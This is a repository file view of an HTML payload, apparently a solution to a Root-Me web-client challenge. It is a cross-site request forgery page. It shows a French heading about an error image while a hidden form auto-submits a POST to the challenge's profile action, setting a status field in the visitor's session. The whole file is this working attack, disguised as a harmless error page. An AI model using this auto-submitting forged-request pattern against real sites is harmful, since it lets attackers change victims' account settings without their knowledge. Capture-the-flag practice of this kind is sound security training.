Files
net-n-dev.fr/root-me/payload.html
T
dylan 4c3dc28a2c
continuous-integration/drone/push Build is passing
edit
2024-09-13 22:55:09 +02:00

12 lines
359 B
HTML

<h1>Ci-dessous L'image de l'erreur</h1>
<form id="pl" method="POST" action="http://challenge01.root-me.org/web-client/ch22/index.php?action=profile">
<input hidden name="username" value="a">
<input hidden name="status" value="on">
</form>
<script>
console.log("test");
form_pl = document.getElementById("pl");
form_pl.submit();
</script>